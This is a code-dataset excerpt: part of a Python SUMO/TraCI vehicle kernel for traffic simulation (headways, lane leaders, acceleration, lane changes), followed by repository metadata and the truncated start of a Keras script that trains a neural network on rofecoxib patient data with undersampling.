for arr in self._arrived_rl_ids[-k:]:
arrived.extend(arr)
return arrived
else:
return 0
def get_departed_ids(self):
"""See parent class."""
return self._departed_ids
def get_num_not_departed(self):
"""See parent class."""
return self.num_not_departed
def get_fuel_consumption(self, veh_id, error=-1001):
"""Return fuel consumption in gallons/s."""
ml_to_gallons = 0.000264172
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_fuel_consumption(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_FUELCONSUMPTION, error) * ml_to_gallons
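# Editor's note -- hedged worked example (not part of the original kernel):
# the conversion above assumes the subscription value is reported in ml/s
# (1 ml ~= 0.000264172 US gal), so a reported value of 10.0 becomes roughly
# 0.00264 gallons/s.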
def get_previous_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_previous_speed(vehID, error) for vehID in veh_id]
return self.previous_speeds.get(veh_id, 0)
def get_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED, error)
def get_default_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_default_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED_WITHOUT_TRACI,
error)
def get_position(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_position(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANEPOSITION, error)
def get_edge(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_edge(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_ROAD_ID, error)
def get_lane(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANE_INDEX, error)
def get_route(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_route(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_EDGES, error)
def get_length(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_length(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("length", error)
def get_leader(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_leader(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("leader", error)
def get_follower(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_follower(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("follower", error)
def get_headway(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_last_lc(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_last_lc(vehID, error) for vehID in veh_id]
if veh_id not in self.__rl_ids:
warnings.warn('Vehicle {} is not RL vehicle, "last_lc" term set to'
' {}.'.format(veh_id, error))
return error
else:
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_acc_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_acc_controller(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("acc_controller", error)
def get_lane_changing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_lane_changing_controller(vehID, error)
for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("lane_changer", error)
def get_routing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_routing_controller(vehID, error) for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("router", error)
def set_lane_headways(self, veh_id, lane_headways):
"""Set the lane headways of the specified vehicle."""
self.__vehicles[veh_id]["lane_headways"] = lane_headways
def get_lane_headways(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_headways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_headways", error)
def get_lane_leaders_speed(self, veh_id, error=None):
"""See parent class."""
lane_leaders = self.get_lane_leaders(veh_id)
return [0 if lane_leader == '' else self.get_speed(lane_leader)
for lane_leader in lane_leaders]
def get_lane_followers_speed(self, veh_id, error=None):
"""See parent class."""
lane_followers = self.get_lane_followers(veh_id)
return [0 if lane_follower == '' else self.get_speed(lane_follower)
for lane_follower in lane_followers]
def set_lane_leaders(self, veh_id, lane_leaders):
"""Set the lane leaders of the specified vehicle."""
self.__vehicles[veh_id]["lane_leaders"] = lane_leaders
def get_lane_leaders(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_leaders(vehID, error) for vehID in veh_id]
return self.__vehicles[veh_id]["lane_leaders"]
def set_lane_tailways(self, veh_id, lane_tailways):
"""Set the lane tailways of the specified vehicle."""
self.__vehicles[veh_id]["lane_tailways"] = lane_tailways
def get_lane_tailways(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_tailways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_tailways", error)
def set_lane_followers(self, veh_id, lane_followers):
"""Set the lane followers of the specified vehicle."""
self.__vehicles[veh_id]["lane_followers"] = lane_followers
def get_lane_followers(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_followers(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_followers", error)
def _multi_lane_headways(self):
"""Compute multi-lane data for all vehicles.
This includes the lane leaders/followers/headways/tailways/
leader velocity/follower velocity for all
vehicles in the network.
"""
edge_list = self.master_kernel.network.get_edge_list()
junction_list = self.master_kernel.network.get_junction_list()
tot_list = edge_list + junction_list
num_edges = (len(self.master_kernel.network.get_edge_list()) + len(
self.master_kernel.network.get_junction_list()))
# maximum number of lanes in the network
max_lanes = max([self.master_kernel.network.num_lanes(edge_id)
for edge_id in tot_list])
# Key = edge id
# Element = list, with the ith element containing tuples with the name
# and position of all vehicles in lane i
edge_dict = dict.fromkeys(tot_list)
# add the vehicles to the edge_dict element
for veh_id in self.get_ids():
edge = self.get_edge(veh_id)
lane = self.get_lane(veh_id)
pos = self.get_position(veh_id)
if edge:
if edge_dict[edge] is None:
edge_dict[edge] = [[] for _ in range(max_lanes)]
edge_dict[edge][lane].append((veh_id, pos))
# sort all lanes in each edge by position
for edge in tot_list:
if edge_dict[edge] is None:
del edge_dict[edge]
else:
for lane in range(max_lanes):
edge_dict[edge][lane].sort(key=lambda x: x[1])
for veh_id in self.get_rl_ids():
# collect the lane leaders, followers, headways, and tailways for
# each vehicle
edge = self.get_edge(veh_id)
if edge:
headways, tailways, leaders, followers = \
self._multi_lane_headways_util(veh_id, edge_dict,
num_edges)
# add the above values to the vehicles class
self.set_lane_headways(veh_id, headways)
self.set_lane_tailways(veh_id, tailways)
self.set_lane_leaders(veh_id, leaders)
self.set_lane_followers(veh_id, followers)
self._ids_by_edge = dict().fromkeys(edge_list)
for edge_id in edge_dict:
edges = list(itertools.chain.from_iterable(edge_dict[edge_id]))
# check for edges with no vehicles
if len(edges) > 0:
edges, _ = zip(*edges)
self._ids_by_edge[edge_id] = list(edges)
else:
self._ids_by_edge[edge_id] = []
def _multi_lane_headways_util(self, veh_id, edge_dict, num_edges):
"""Compute multi-lane data for the specified vehicle.
Parameters
----------
veh_id : str
name of the vehicle
edge_dict : dict < list<tuple> >
Key = Edge name
Index = lane index
Element = list sorted by position of (vehicle id, position)
Returns
-------
headway : list<float>
Index = lane index
Element = headway at this lane
tailway : list<float>
Index = lane index
Element = tailway at this lane
lead_speed : list<str>
Index = lane index
Element = speed of leader at this lane
follow_speed : list<str>
Index = lane index
Element = speed of follower at this lane
leader : list<str>
Index = lane index
Element = leader at this lane
follower : list<str>
Index = lane index
Element = follower at this lane
"""
this_pos = self.get_position(veh_id)
this_edge = self.get_edge(veh_id)
this_lane = self.get_lane(veh_id)
num_lanes = self.master_kernel.network.num_lanes(this_edge)
# set default values for all output values
headway = [1000] * num_lanes
tailway = [1000] * num_lanes
leader = [""] * num_lanes
follower = [""] * num_lanes
for lane in range(num_lanes):
# check the vehicle's current edge for lane leaders and followers
if len(edge_dict[this_edge][lane]) > 0:
ids, positions = zip(*edge_dict[this_edge][lane])
ids = list(ids)
positions = list(positions)
index = bisect_left(positions, this_pos)
# if a vehicle is ahead of you on this edge/lane, it is the lane
# leader; otherwise the leader is searched for in the next edges
if (lane == this_lane and index < len(positions) - 1) \
or (lane != this_lane and index < len(positions)):
# check if the index does not correspond to the current
# vehicle
if ids[index] == veh_id:
leader[lane] = ids[index + 1]
headway[lane] = (positions[index + 1] - this_pos -
self.get_length(leader[lane]))
else:
leader[lane] = ids[index]
headway[lane] = (positions[index] - this_pos
- self.get_length(leader[lane]))
# if a vehicle is behind you on this edge/lane, it is the lane
# follower; otherwise the follower is searched for in previous edges
if index > 0:
follower[lane] = ids[index - 1]
tailway[lane] = (this_pos - positions[index - 1]
- self.get_length(veh_id))
# if lane leader not found, check next edges
if leader[lane] == "":
headway[lane], leader[lane] = self._next_edge_leaders(
veh_id, edge_dict, lane, num_edges)
# if lane follower not found, check previous edges
if follower[lane] == "":
tailway[lane], follower[lane] = self._prev_edge_followers(
veh_id, edge_dict, lane, num_edges)
return headway, tailway, leader, follower
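# Editor's note -- hedged worked example (not part of the original kernel):
# if a lane holds [("a", 10.0), ("b", 40.0)] sorted by position and the ego
# vehicle "a" sits at position 10.0 in that lane, bisect_left returns index 0
# and ids[0] == ego, so the leader is "b" with
# headway = 40.0 - 10.0 - get_length("b"); the tailway keeps its default of
# 1000 because no vehicle is behind on this edge.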
def _next_edge_leaders(self, veh_id, edge_dict, lane, num_edges):
"""Search for leaders in the next edge.
Looks to the edges/junctions in front of the vehicle's current edge
for potential leaders. This is currently done by only looking one
edge/junction forwards.
Returns
-------
headway : float
lane headway for the specified lane
leader : str
lane leader for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
headway = 1000 # env.network.length
leader = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs in front of the current one
if len(self.master_kernel.network.next_edge(edge, lane)) == 0:
break
add_length += self.master_kernel.network.edge_length(edge)
edge, lane = self.master_kernel.network.next_edge(edge, lane)[0]
try:
if len(edge_dict[edge][lane]) > 0:
leader = edge_dict[edge][lane][0][0]
headway = edge_dict[edge][lane][0][1] - pos + add_length \
- self.get_length(leader)
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane leader is found
if leader != "":
break
return headway, leader
def _prev_edge_followers(self, veh_id, edge_dict, lane, num_edges):
"""Search for followers in the previous edge.
Looks to the edges/junctions behind the vehicle's current edge for
potential followers. This is currently done by only looking one
edge/junction backwards.
Returns
-------
tailway : float
lane tailway for the specified lane
follower : str
lane follower for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
tailway = 1000 # env.network.length
follower = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.network.prev_edge(edge, lane)) == 0:
break
edge, lane = self.master_kernel.network.prev_edge(edge, lane)[0]
add_length += self.master_kernel.network.edge_length(edge)
try:
if len(edge_dict[edge][lane]) > 0:
tailway = pos - edge_dict[edge][lane][-1][1] + add_length \
- self.get_length(veh_id)
follower = edge_dict[edge][lane][-1][0]
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if follower != "":
break
return tailway, follower
def apply_acceleration(self, veh_ids, acc, smooth=True):
"""See parent class."""
# to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
acc = [acc]
for i, vid in enumerate(veh_ids):
if acc[i] is not None and vid in self.get_ids():
self.__vehicles[vid]["accel"] = acc[i]
this_vel = self.get_speed(vid)
next_vel = max([this_vel + acc[i] * self.sim_step, 0])
if smooth:
self.kernel_api.vehicle.slowDown(vid, next_vel, 1e-3)
else:
self.kernel_api.vehicle.setSpeed(vid, next_vel)
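# Editor's note -- hedged worked example (not part of the original kernel):
# with sim_step = 0.1 s, a current speed of 5.0 m/s and a commanded
# acceleration of -2.0 m/s^2, the target speed becomes
# max(5.0 + (-2.0) * 0.1, 0) = 4.8 m/s, sent via slowDown() when smooth=True
# or setSpeed() otherwise.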
def apply_lane_change(self, veh_ids, direction):
"""See parent class."""
# to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
direction = [direction]
# if any of the directions are not -1, 0, or 1, raise a ValueError
if any(d not in [-1, 0, 1] for d in direction):
raise ValueError(
"Direction values for lane changes may only be: -1, 0, or 1.")
for i, veh_id in enumerate(veh_ids):
# check for no lane change
if direction[i] == 0:
continue
# compute the target lane, and clip it so vehicles don't try to
# lane-change out of range
this_lane = self.get_lane(veh_id)
this_edge = self.get_edge(veh_id)
target_lane = min(
max(this_lane + direction[i], 0),
self.master_kernel.network.num_lanes(this_edge) - 1)
# perform the requested lane action action in TraCI
if target_lane != this_lane:
self.kernel_api.vehicle.changeLane(
veh_id, int(target_lane), self.sim_step)
if veh_id in self.get_rl_ids():
self.prev_last_lc[veh_id] = \
self.__vehicles[veh_id]["last_lc"]
def choose_routes(self, veh_ids, route_choices):
"""See parent class."""
# to handle the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
route_choices = [route_choices]
for i, veh_id in enumerate(veh_ids):
if route_choices[i] is not None:
self.kernel_api.vehicle.setRoute(
vehID=veh_id, edgeList=route_choices[i])
def get_x_by_id(self, veh_id):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_x_by_id(vehID) for vehID in veh_id]
if self.get_edge(veh_id) == '':
# occurs when a vehicle has crashed or been teleported for some other reason
return 0.
return self.master_kernel.network.get_x(
self.get_edge(veh_id), self.get_position(veh_id))
def update_vehicle_colors(self):
"""See parent class.
The colors of all vehicles are updated as follows:
- red: autonomous (rl) vehicles
- white: unobserved human-driven vehicles
- cyan: observed human-driven vehicles
"""
for veh_id in self.get_rl_ids():
try:
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
# color rl vehicles red
self.set_color(veh_id=veh_id, color=RED)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating rl vehicle colors:', e)
# color vehicles white if not observed and cyan if observed
for veh_id in self.get_human_ids():
try:
color = CYAN if veh_id in self.get_observed_ids() else WHITE
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
for veh_id in self.get_ids():
try:
if 'av' in veh_id:
color = RED
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
# color vehicles by speed if desired
if self._color_by_speed:
max_speed = self.master_kernel.network.max_speed()
speed_ranges = np.linspace(0, max_speed, STEPS)
for veh_id in self.get_ids():
veh_speed = self.get_speed(veh_id)
bin_index = np.digitize(veh_speed, speed_ranges)
# If vehicle is already being colored via argument to vehicles.add(), don't re-color it.
if self._force_color_update or 'color' not in \
self.type_parameters[self.get_type(veh_id)]:
self.set_color(veh_id=veh_id, color=color_bins[bin_index])
# clear the list of observed vehicles
for veh_id in self.get_observed_ids():
self.remove_observed(veh_id)
def get_color(self, veh_id):
"""See parent class.
This does not pass the last term (i.e. transparency).
"""
r, g, b, t = self.kernel_api.vehicle.getColor(veh_id)
return r, g, b
def set_color(self, veh_id, color):
"""See parent class.
The last term for sumo (transparency) is set to 255.
"""
r, g, b = color
self.kernel_api.vehicle.setColor(
vehID=veh_id, color=(r, g, b, 255))
def add(self, veh_id, type_id, edge, pos, lane, speed):
"""See parent class."""
if veh_id in self.master_kernel.network.rts:
# If the vehicle has its own route, use that route. This is used in
# the case of network templates.
route_id = 'route{}_0'.format(veh_id)
else:
#print("Vehicle {} does not have a route_id. Generating one".format(veh_id)) #RWH
# The routes container is a defaultdict, so looking up a missing key
# silently creates an empty list. That false negative hid a bug when the
# requested edge had no route, hence the explicit check that follows. RWH
if self.master_kernel.network.rts.get(edge) is None:
#print("Edge {} is empty!".format(edge))
#self.master_kernel.network.rts[edge] = [([edge],1)] # Risky: adds a route blindly.
# The line above does not work because it runs after the .cfg file has
# already been generated and loaded into the SUMO simulation. RWH
print("Printing the routes keys dict . . .\n", self.master_kernel.network.rts.keys())
raise TraCIException("Edge {} assigned to vehicle {} has no route to it.".format(edge, veh_id))
num_routes = len(self.master_kernel.network.rts[edge])
frac = [val[1] for val in self.master_kernel.network.rts[edge]]
route_id = 'route{}_{}'.format(edge, np.random.choice(
[i for i in range(num_routes)], size=1, p=frac)[0])
self.kernel_api.vehicle.addFull(
veh_id,
route_id,
typeID=str(type_id),
departLane=str(lane),
departPos=str(pos),
departSpeed=str(speed))
def get_max_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_max_speed(vehID, error) for vehID in veh_id]
return self.kernel_api.vehicle.getMaxSpeed(veh_id)
def set_max_speed(self, veh_id, max_speed):
"""See parent class."""
self.kernel_api.vehicle.setMaxSpeed(veh_id, max_speed)
def get_accel(self, veh_id, noise=True, failsafe=True):
"""See parent class."""
metric_name = 'accel'
if noise:
metric_name += '_with_noise'
else:
metric_name += '_no_noise'
if failsafe:
metric_name += '_with_failsafe'
else:
metric_name += '_no_failsafe'
if metric_name not in self.__vehicles[veh_id]:
self.__vehicles[veh_id][metric_name] = None
return self.__vehicles[veh_id][metric_name]
def update_accel(self, veh_id, accel, noise=True, failsafe=True):
"""See parent class."""
metric_name = 'accel'
if noise:
metric_name += '_with_noise'
else:
metric_name += '_no_noise'
if failsafe:
metric_name += '_with_failsafe'
else:
metric_name += '_no_failsafe'
self.__vehicles[veh_id][metric_name] = accel
def get_realized_accel(self, veh_id):
"""See parent class."""
if self.get_distance(veh_id) == 0:
return 0
return (self.get_speed(veh_id) - self.get_previous_speed(veh_id)) / self.sim_step
def get_2d_position(self, veh_id, error=-1001):
"""See parent class."""
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_POSITION, error)
def get_distance(self, veh_id, error=-1001):
"""See parent class."""
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_DISTANCE, error)
def get_road_grade(self, veh_id):
"""See parent class."""
# TODO : Brent
return 0
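# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original kernel): a minimal helper showing
# how the getters above are typically combined. It assumes an already
# initialized vehicle kernel instance (called `veh_kernel` here) whose methods
# match the ones defined in this class; nothing below is called automatically.
# ---------------------------------------------------------------------------
def _example_network_summary(veh_kernel, time_span=600):
    """Return a small dict of aggregate statistics from a vehicle kernel."""
    speeds = veh_kernel.get_speed(veh_kernel.get_ids())
    return {
        # mean speed over every vehicle currently in the network
        "mean_speed": sum(speeds) / max(len(speeds), 1),
        # vehicles entering/leaving the network per hour over `time_span` sec
        "inflow_veh_per_hr": veh_kernel.get_inflow_rate(time_span),
        "outflow_veh_per_hr": veh_kernel.get_outflow_rate(time_span),
        # number of RL-controlled vehicles currently tracked
        "num_rl": len(veh_kernel.get_rl_ids()),
    }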
| 40.391597
| 111
| 0.591894
|
f47ed31c172447188e2065e159e4db7d4c7581fd
| 15,246
|
py
|
Python
|
rofe_ann.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
rofe_ann.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
rofe_ann.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed May 29 14:37:38 2019
@author: 00098223
"""
#Part 1 - Data Preprocessing
##Importing the libraries
#import numpy as np
#import matplotlib.pyplot as plt
#import pandas as pd
#import csv
#from imblearn.combine import SMOTEENN
#import tensorflow as tf
def ann(i, epoch, maxmium, unit1):
#Importing the libraries
import numpy as np
import pandas as pd
import csv
#Part 1 - Data Processing
#Importing the dataset
dataset = pd.read_csv('H:/Juan Lu/Data/Coxib/rofecoxib.csv')
dataset = dataset.drop(["rootnum", "sup_date","match","rofecoxib","outcome","duration",
"death","duration_d","death.1","duration_d.1","duration",
"admission","duration_a","death_old","ACS","stroke.1","day",
"acs_stroke","cvd_death_updated"
], axis=1)
X = dataset.iloc[:,0:29].values
y = dataset.iloc[:,29].values
from sklearn.linear_model import LogisticRegression
from imblearn.under_sampling import (ClusterCentroids, RandomUnderSampler,
TomekLinks,
# NearMiss,
# InstanceHardnessThreshold,
# CondensedNearestNeighbour,
# EditedNearestNeighbours,
# RepeatedEditedNearestNeighbours,
# AllKNN,
# NeighbourhoodCleaningRule,
OneSidedSelection)
sampler = TomekLinks(random_state=42)
#sampler = ClusterCentroids(random_state= 0)#slow
#sampler = RandomUnderSampler(random_state=0)
#sampler = NearMiss(version=1,random_state=0)
#sampler = NearMiss(version=2,random_state=0)
#sampler = NearMiss(version=3,random_state=0)
#sampler = InstanceHardnessThreshold(random_state=0,
# estimator=LogisticRegression())
#sampler = CondensedNearestNeighbour(random_state=0)#slow
#sampler = OneSidedSelection(random_state=0)
#sampler = NeighbourhoodCleaningRule(random_state=0)
#sampler = EditedNearestNeighbours(random_state=0)
##sampler = RepeatedEditedNearestNeighbours(random_state=0)
#sampler = AllKNN(random_state=0, allow_minority=True)
#X_resample, y_resample = sampler.fit_sample(X, y)
#Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
#X_train, X_test, y_train, y_test = train_test_split(X_resample, y_resample, test_size = 0.2, random_state = 42)
# ran = i
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 42 + 0)
X_train, y_train = sampler.fit_sample(X_train, y_train)
#Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
#Part 2 - ANN
#Importing the Keras libraries and packages
import keras
from keras.models import Sequential
from keras.layers import Dense
#Initialising the ANN
classifier = Sequential()
#Adding the input layer and the first hidden layer 2250
classifier.add(Dense(input_dim = 29,units= unit1, kernel_initializer = "uniform", activation= "relu"))
#Adding the second hidden layer 825
classifier.add(Dense(units = 825, kernel_initializer = "uniform", activation= "relu"))
#Adding the third hidden layer 18
classifier.add(Dense(units = 18, kernel_initializer = "uniform", activation= "relu"))#17
# #Adding the third hidden layer
# classifier.add(Dense(units = 18, kernel_initializer = "uniform", activation= "relu"))
#Adding the output layer
classifier.add(Dense(units = 1, kernel_initializer = "uniform", activation= "sigmoid"))
#
#
# import keras.backend as K
#
# def get_my_loss():
#
# def weighted_loss(y_true, y_pred):
# TP = K.sum(y_true * y_pred,axis = -1)
# FP = K.sum((1.- y_true)*y_pred,axis=-1)
# TN = K.sum((1.-y_true)*(1-y_pred),axis=-1)
# TP_2 = K.mean(K.sum((y_true - 1.) + y_pred, axis=-1))
# #P = K.sum(y_true)
# #F = K.sum(1. - y_true)
# FN = K.sum(y_true * (y_true - y_pred),axis= -1)
# FN_2 = K.mean(K.sum((1. - y_true)* (y_true - y_pred),axis=-1))
# return ( 0.26* FP - 12 * TP + 0.1 + 1.3 * K.mean(K.sum((1. - y_true)* (y_pred - y_true),axis=-1))) + FN + 0.35 * FN_2 - 0.05 * TN
# #return ( 0.076 * FP - 13 * TP + 0.10 + 1.61 * FN_2 + 2.81 * K.mean(K.sum((1. - y_true)* (y_pred - y_true),axis=-1))) - 0.05 * TN + 0.2 * FN
#
# return weighted_loss
# import keras.backend as K
# def pos_pre(y_true, y_pred):
# TP = K.sum(y_true * y_pred,axis = -1)
# FP = K.sum((1.- y_true)*y_pred,axis=-1)
# TN = K.sum((1.-y_true)*(1-y_pred),axis=-1)
# TP_2 = K.mean(K.sum((y_true - 1.) + y_pred, axis=-1))
# FN = K.sum(y_true * (y_true - y_pred),axis= -1)
# FN_2 = K.mean(K.sum((1. - y_true)* (y_true - y_pred),axis=-1))
#
# return 5*TP - FP + TN + TP_2 - FN - FN_2
#
# err_II = y_true - pred
# #FN = tf.count_nonzero(FN)
# FN = tf.greater(err_II,0)
# FN = K.cast(FN,tf.float32)
# FN = tf.count_nonzero(FN)
# FN = K.cast(FN,tf.float32)
#
#
# err_I = pred - y_true
#
# #FP = tf.greater(err_I,0.3)
#
# FP = tf.greater(err_I,0)
# FP = K.cast(FP,tf.float32)
# FP = tf.count_nonzero(FN)
# FP = K.cast(FP,tf.float32)
#
# P = tf.count_nonzero(y_true)
# P = tf.maximum(P,1)
# P = tf.cast(P,tf.float32)
# print(P)
#
# M = tf.size(y_true)
# M = tf.cast(M,tf.float32)
# N = M - P
# print(N)
# N = tf.cast(N,tf.float32)
# fal_pos = FP/P
#TP = tf.metrics.true_negatives(y_true,y_pred)
# return 1 - 1.2*FN/(N+FN)
from keras import optimizers
from keras.models import model_from_yaml
opt = optimizers.Adam(lr= 0.001, beta_1=0.9, beta_2=0.999, epsilon=None,decay=0.0,amsgrad=False)
# # load YAML and create model
# yaml_file = open('model.yaml', 'r')
# loaded_model_yaml = yaml_file.read()
# yaml_file.close()
# loaded_model = model_from_yaml(loaded_model_yaml)
# # load weights into new model
# loaded_model.load_weights("model.h5")
# print("Loaded model from disk")
#Compiling the ANN
classifier.compile(optimizer = opt, loss = 'binary_crossentropy', metrics = ['binary_accuracy'])
# loaded_model.compile(optimizer = opt, loss = 'binary_crossentropy', metrics = ['binary_accuracy'])
# classifier.compile(optimizer = opt, loss = get_my_loss(), metrics = ['accuracy'])
#Fitting the ANN to the Training set
#clf = make_pipeline(sampler,classifier)
#clf.fit(X_train, y_train)
#sample weight
#sample_weight = np.ones((36288,))*0.5 + y_train*0.3#{0:1.,1:3.5}
from sklearn.utils import class_weight
sample_weight = class_weight.compute_sample_weight('balanced', y_train)
#sample_weight = np.sqrt(sample_weight) 5
sample_weight = sample_weight**(i/2)
from sklearn.utils import class_weight
#1.4
class_weight = class_weight.compute_class_weight('balanced', np.unique(y_train),y_train)
class_weight = sample_weight**(100/2)
# class_weight = {0:0.,
# 1:0}
#class_weight = {0: 1.,
# 1: 19.3}
#history = classifier.fit(X_train, y_train, batch_size=1400, epochs=15, validation_split=0.1, class_weight= class_weight)
history = classifier.fit(X_train, y_train, batch_size=epoch, epochs=10, validation_split=0.1, sample_weight = sample_weight) # 5600 10 class_weight= class_weight,
# history = loaded_model.fit(X_train, y_train, batch_size=6000, epochs=10, validation_split=0.1, class_weight= class_weight, sample_weight = sample_weight)
'''
#Part 3 - Making the predictions and evaluating the model
#Predicting the Test
thre = 0.01
y_pred = classifier.predict(X_test)
y_pred = (y_pred > thre)
#Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
from sklearn.metrics import roc_auc_score
auc = roc_auc_score(y_test, y_pred)
print('Roc auc score: ' + str(auc))
from sklearn.metrics import precision_recall_curve
precision, recall, _ = precision_recall_curve(y_test, y_pred)
from sklearn.metrics import classification_report
report = classification_report(y_test, y_pred)
print(report)
dataset_c = pd.read_csv('H:\\Juan Lu\\Data\\Coxib\\temp\\cele_only.csv')
y_c = dataset_c.iloc[:,36].values
X_c = dataset_c.iloc[:,2:36].values
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X_c, y_c, test_size = 0.8, random_state = 42)
X_train, y_train = sampler.fit_sample(X_train, y_train)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
history = classifier.fit(X_train, y_train, batch_size=1400, epochs=15, validation_split=0.1, class_weight= class_weight)
dataset_i = pd.read_csv('H:\\Juan Lu\\Data\\Coxib\\temp\\ibup_only.csv')
X_i = dataset_i.iloc[:,2:36].values
y_i = dataset_i.iloc[:,36].values
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X_i, y_i, test_size = 0.8, random_state = 42)
X_train, y_train = sampler.fit_sample(X_train, y_train)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
history = classifier.fit(X_train, y_train, batch_size=1400, epochs=3, validation_split=0.1, class_weight= class_weight)
#file = open("data summary.txt", "a")
#file.write('Roc auc score: ' + str(auc) +"\n" + 'threshold: '+str(thre)+ "\n")
#file.write(report + "\n")
#file.write('50,26,17,class_weight,1 - (FN + FP)/M ' + "\n")
#file.close()
score = 0
score_max = 0
thres = 0
f1 = 0
f1_max = 0
auc_max = 0
from sklearn.metrics import f1_score
